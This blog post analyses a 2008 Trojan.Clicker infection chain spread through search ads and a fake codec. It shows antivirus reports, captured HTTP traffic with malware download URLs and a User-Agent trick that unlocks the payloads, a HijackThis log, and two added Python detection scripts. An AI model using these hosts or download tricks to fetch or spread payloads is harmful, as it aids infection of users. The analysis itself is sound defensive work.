Trojan.Clicker served through beedly.us ADS
Today, while I was searching on beedly.us, I found this ad:

Why do I get porn when I search for “free online virus”?
I followed the ad to analyze it and arrived at a fake porn site whose HTML contains malicious code designed to trick the user into downloading a so-called “codec”.
This is the virus scanner report for v-codec.1181_exe:
Report Generated 21.11.2008 at 20.17.23 (GMT 1)
Filename: v-codec.1181_exe
File size: 51 KB
MD5 Hash: 9C647C677459F4BB0A5C713FC22CBE2D
SHA1 Hash: 771FB9120A2A5F2C4952DB76B5D4D04ADAC825DF
CRC32: 3626635896
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 2 on 23
Antivirus Result
a-squared -
Avira AntiVir -
Avast Win32:Trojan-gen {Other} (0)
AVG -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Win32:Trojan-gen {Other} B
IkarusT3 -
Kaspersky -
McAfee -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -
I analyzed v-codec.1181.exe, and after executing it I started to see traffic to the domain:
dsfcdasfvdsfdsf.com
Internet traffic:
GET /file989.php?id=3504966279&adv=1181 HTTP/1.1
User-Agent: wget 3.0
Host: dsfcdasfvdsfdsf.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html

af
hxxp://69.46.24.95/addon/video1181.cfg
hxxp://lyox-lib.com/addon/video1181.cfg
hxxp://78.157.143.164/addon/video1181.cfg
hxxp://85.92.157.141/plus/offersfortoday/get_file.php
0

GET /script989.php?id=3504966279&adv=1181 HTTP/1.1
User-Agent: wget 3.0
Host: dsfcdasfvdsfdsf.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html

0
I tried to download those files, but it seems the server checks the User-Agent: if it is “User-Agent: wget 3.0” it lets you download the files, otherwise it refuses the connection.
After some time, new files were created:
%User%\Desktop\26.exe (Undetected)
%User%\Desktop\video.cfg (Trojan-Dropper - Ikarus)
After their execution, other files were dropped in system32:

And after, I got new traffic:
GET /bc/ads/728x90/4911a067982da.html HTTP/1.1
Referer: hxxp://s2.offersfortoday.com/bc/1oft.php
Accept-Language: en-us
Host: s2.offersfortoday.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 10:50:18 GMT
Server: Apache/2.2.8 (Fedora)
Content-Length: 597
Connection: close
Content-Type: text/html; charset=UTF-8
...

POST /bc/1oft.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Host: s2.offersfortoday.com
Content-Length: 124
Connection: Keep-Alive
...

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 1750
Connection: close
Content-Type: text/html; charset=UTF-8
...
...
And then I got some new, more interesting traffic:
GET /icons/logo.gif HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 193.142.244.49
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 11:12:39 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.6
Content-Disposition: attachment; filename=fileng.gif
Content-Length: 85504
Connection: close
Content-Type: application/octet-stream
X-Pad: avoid browser bug
.....
Let's scan the logo.gif:
Report Generated 21.11.2008 at 20.42.52 (GMT 1)
Filename: logo_gif
File size: 83 KB
MD5 Hash: DFEB72EAABE0C3B7588874D90E8DA844
SHA1 Hash: 83FA80CAC59736B86D4036C511B408609F911D7E
CRC32: 902639292
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 1 on 23
Antivirus Result
a-squared -
Avira AntiVir -
Avast -
AVG -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA -
IkarusT3 -
Kaspersky -
McAfee -
NOD32 v3 -
Norman Aggressive commersial W32/FakeAlert.VA ()
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -
Looks like a virus!
Afterwards, I got new traffic:
GET /plus/offersfortoday/get_file.php HTTP/1.1
User-Agent: wget 3.0
Host: 85.92.157.141
Cache-Control: no-cache

HTTP/1.1 302 Found
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
Location: multi/2.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
...
Another .EXE file gets downloaded and executed, following the redirect:
Location: multi/2.exe
Internet traffic:
GET /plus/offersfortoday/multi/2.exe HTTP/1.1
User-Agent: wget 3.0
Host: 85.92.157.141
Cache-Control: no-cache
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 11:18:51 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
Accept-Ranges: bytes
Content-Length: 551125
Connection: close
Content-Type: application/x-msdos-program
...

GET /s3.offersfortoday.com/get_file.php HTTP/1.1
Accept-Encoding: gzip, deflate
Host: 77.245.61.232
Connection: Keep-Alive

HTTP/1.1 403 Forbidden
Date: Fri, 21 Nov 2008 11:19:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch10
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1
...
And after that I got new traffic, with a new domain:
GET /install.php?hwid=xxx&aff=searchersmart HTTP/1.1
Host: searchersmart.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache/1.3.36 (Unix) PHP/5.1.6
X-Powered-By: PHP/5.1.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml
...

GET /cset.php?id=xxx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: XML
Host: last-visit.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 11:19:51 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.6 with Suhosin-Patch
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/xml; charset=UTF-8
ENCRYPTED DATA
And again another new .EXE was downloaded and executed:
GET /perce.php?xxx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: XML
Host: 193.142.244.29
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch
Content-Disposition: attachment; filename=perce.php
Content-Length: 97280
Connection: close
Content-Type: application/octet-stream
...
The file perce.php is in reality an executable file.
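Three things in the captures above can be turned into proxy-log checks on the defender's side: the download servers only answered requests carrying the "wget 3.0" User-Agent (later components used "XML"), a 302 pointed straight at an .exe, and files named .gif or .php arrived as application/octet-stream attachments that were really Windows executables. The Python below is an added example written for this post, not the author's tooling; the sample exchanges are constructed from the headers shown above, and the indicator names, the function names and the list of non-browser agents are my own choices.

```python
"""Triage of captured HTTP exchanges for the download-chain indicators seen in
the post. Added example (not the author's tooling); sample data is constructed
from the headers quoted in the post."""
import re

# Constructed samples: abbreviated request/response pairs from the capture.
SAMPLE_EXCHANGES = [
    ("GET /file989.php?id=3504966279&adv=1181 HTTP/1.1\r\n"
     "User-Agent: wget 3.0\r\n"
     "Host: dsfcdasfvdsfdsf.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\n"
     "Content-Type: text/html\r\n\r\n"),
    ("GET /icons/logo.gif HTTP/1.1\r\n"
     "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
     "Host: 193.142.244.49\r\n\r\n",
     "HTTP/1.1 200 OK\r\n"
     "Content-Disposition: attachment; filename=fileng.gif\r\n"
     "Content-Type: application/octet-stream\r\n\r\n"),
    ("GET /plus/offersfortoday/get_file.php HTTP/1.1\r\n"
     "User-Agent: wget 3.0\r\n"
     "Host: 85.92.157.141\r\n\r\n",
     "HTTP/1.1 302 Found\r\n"
     "Location: multi/2.exe\r\n"
     "Content-Length: 0\r\n\r\n"),
    ("GET /cset.php?id=xxx HTTP/1.1\r\n"
     "User-Agent: XML\r\n"
     "Host: last-visit.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\n"
     "Content-Type: application/xml; charset=UTF-8\r\n\r\n"),
]

# Agent strings that no browser sends (assumed list): "wget 3.0" is the token the
# download servers required, "XML" is what the later components used.
NON_BROWSER_AGENTS = {"wget 3.0", "xml"}
IMAGE_EXTENSIONS = (".gif", ".jpg", ".jpeg", ".png")


def parse_message(raw):
    """Split a raw HTTP message into (start line, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage(request, response):
    """Return the indicator names that fire on one request/response pair."""
    _, req = parse_message(request)
    resp_line, resp = parse_message(response)
    hits = []
    if req.get("user-agent", "").lower() in NON_BROWSER_AGENTS:
        hits.append("non-browser user-agent")
    # An "image" delivered as an opaque attachment is how the fake .gif arrived.
    m = re.search(r'filename="?([^";]+)', resp.get("content-disposition", ""))
    if m and m.group(1).lower().endswith(IMAGE_EXTENSIONS) \
            and resp.get("content-type", "").lower().startswith("application/octet-stream"):
        hits.append("image filename served as octet-stream")
    # A 3xx whose Location names an .exe is the get_file.php -> multi/2.exe step.
    status = resp_line.split()[1]
    if status.startswith("3") and resp.get("location", "").lower().endswith(".exe"):
        hits.append("redirect to executable")
    return hits


def triage_all(exchanges):
    """Run triage over a list of (request, response) pairs."""
    return [(parse_message(req)[0], triage(req, resp)) for req, resp in exchanges]


def is_disguised_executable(filename, data):
    """True when a file not named .exe starts with the DOS 'MZ' signature that
    every Windows PE file carries (the logo.gif / perce.php / item.gif case)."""
    return not filename.lower().endswith(".exe") and data[:2] == b"MZ"


if __name__ == "__main__":
    for start_line, hits in triage_all(SAMPLE_EXCHANGES):
        print(start_line, "->", hits or "clean")
    print(is_disguised_executable("item.gif", b"MZ\x90\x00"))  # constructed bytes
```

Run as a script it prints one line per exchange; the same functions can be fed exchanges reconstructed from a proxy log or a pcap. The User-Agent check is deliberately a plain set lookup, because the whole point of the capture is that a fixed, unusual string was the key that unlocked the downloads.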
I got more traffic with the previous domain:
GET /images/item_eele.gif HTTP/1.1
Host: 193.142.244.55
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) PHP/5.2.6
Content-Disposition: attachment; filename=item.gif
Content-Length: 131076
Connection: close
Content-Type: application/octet-stream
...
This .GIF file too:
Content-Disposition: attachment; filename=item.gif
is in reality an executable file, detected by Avira as TR/Dropper.Gen. The story is not yet finished! After some time, some messages appeared on the screen:


I noticed a new file was created on the system that looks like the installer of the well-known rogue security software Antivirus 2009:

Below is an image of the files created on my system:

And finally, this is the HijackThis log with the traces of the malware:
Running processes:
C:\WINDOWS\System32\regsvr32.exe
%User%\Desktop\video.exe
C:\Program Files\Internet Explorer\iexplore.exe
%User%\LOCALS~1\Temp\~tmpc.exe
O2 - BHO: XML module - {500BCA15-57A7-4eaf-8143-8C619470B13D} - C:\WINDOWS\system32\msxml71.dll
O2 - BHO: searchersmart search enhancer - {700A0D5E-225D-3C33-ACDF-4AEEE0C48457} - C:\WINDOWS\system32\csfidvimyk.dll
O2 - BHO: offersfortoday browser enhancer - {E6605557-A595-E813-0A66-1AD6B5FC5928} - C:\WINDOWS\system32\advnpzdvsgjwkm.dll
O4 - HKLM\..\Run: [jlmnoczzqqe] C:\WINDOWS\System32\regsvr32.exe /s "C:\WINDOWS\system32\advnpzdvsgjwkm.dll"
O4 - HKCU\..\Run: [MSFox] %User%\Desktop\video.exe
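Three traits of this log lend themselves to an automated first pass: BHO DLLs and Run-key value names with random-looking, nearly vowel-free names; regsvr32.exe /s used from a Run key to load a DLL at every logon; and an autorun entry pointing into the user's profile (Desktop, Temp). The Python below is an added example, not the author's or HijackThis' code. The five O2/O4 lines are copied from the log above using HijackThis' standard " - " separators; the vowel-ratio threshold, the profile-path markers and the indicator names are my own assumptions.

```python
"""Triage of HijackThis O2 (BHO) and O4 (Run key) lines for the traits the post's
log shows. Added example; the sample log lines are copied from the post."""
import re

SAMPLE_LOG = r"""O2 - BHO: XML module - {500BCA15-57A7-4eaf-8143-8C619470B13D} - C:\WINDOWS\system32\msxml71.dll
O2 - BHO: searchersmart search enhancer - {700A0D5E-225D-3C33-ACDF-4AEEE0C48457} - C:\WINDOWS\system32\csfidvimyk.dll
O2 - BHO: offersfortoday browser enhancer - {E6605557-A595-E813-0A66-1AD6B5FC5928} - C:\WINDOWS\system32\advnpzdvsgjwkm.dll
O4 - HKLM\..\Run: [jlmnoczzqqe] C:\WINDOWS\System32\regsvr32.exe /s "C:\WINDOWS\system32\advnpzdvsgjwkm.dll"
O4 - HKCU\..\Run: [MSFox] %User%\Desktop\video.exe
"""

O2_RE = re.compile(r"^O2 - BHO: (?P<name>.*?) - (?P<clsid>\{[0-9A-Fa-f-]+\}) - (?P<path>.+)$")
O4_RE = re.compile(r"^O4 - (?P<hive>HK\w+)\\\.\.\\Run: \[(?P<value>[^\]]*)\] (?P<cmd>.+)$")
# Bare file stems of any .dll/.exe mentioned in a path or command line.
FILE_RE = re.compile(r'([^\\/"\s]+)\.(?:dll|exe)', re.IGNORECASE)
# Assumed markers for user-writable locations an autorun should not point into.
USER_PATH_MARKERS = ("%user%", "\\desktop\\", "\\temp\\", "\\locals~1\\")


def looks_random(name):
    """Heuristic for machine-generated names: at least 10 letters and fewer than
    a quarter of them vowels (threshold is an assumption, tuned to this log)."""
    letters = [c for c in name.lower() if c.isalpha()]
    if len(letters) < 10:
        return False
    return sum(c in "aeiou" for c in letters) / len(letters) < 0.25


def triage_line(line):
    """Return the indicator names that fire on one O2/O4 line (empty if none)."""
    hits = []
    m = O2_RE.match(line)
    if m:
        stem = FILE_RE.search(m.group("path"))
        if stem and looks_random(stem.group(1)):
            hits.append("random-looking name")
        return hits
    m = O4_RE.match(line)
    if m:
        cmd = m.group("cmd")
        low = cmd.lower()
        # regsvr32 /s silently (re)registers a DLL; from a Run key it is a loader.
        if "regsvr32" in low and "/s" in low:
            hits.append("regsvr32 persistence")
        names = [m.group("value")] + FILE_RE.findall(cmd)
        if any(looks_random(n) for n in names):
            hits.append("random-looking name")
        if any(marker in low for marker in USER_PATH_MARKERS):
            hits.append("autorun from user profile")
    return hits


def triage_log(text):
    """Map every non-empty log line to the indicators it triggers."""
    return [(line, triage_line(line)) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for line, hits in triage_log(SAMPLE_LOG):
        print(hits or "clean", "<-", line)
```

Note what the heuristic misses: msxml71.dll passes the name test because it imitates the legitimate msxml DLL family, so a script like this is a way to prioritise lines, not a verdict. The CLSID and the file hash of each flagged (and unflagged) module still need to be checked, which is what the HijackThis exchange in the comments below is about.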

December 9th, 2008 at 9:15 am
Hi Robert,
Avast found it on my computer. I asked Avast to stop the connection and erase the files. However, from that day, each time I use the computer Avast detects again the trojan. How can I make sure I get rid of it?
Thanks,
December 9th, 2008 at 2:23 pm
Hey Nykô,
Download HijackThis, scan your PC and send the log file to my email, so I can tell you how to remove the trojan files.
-Robert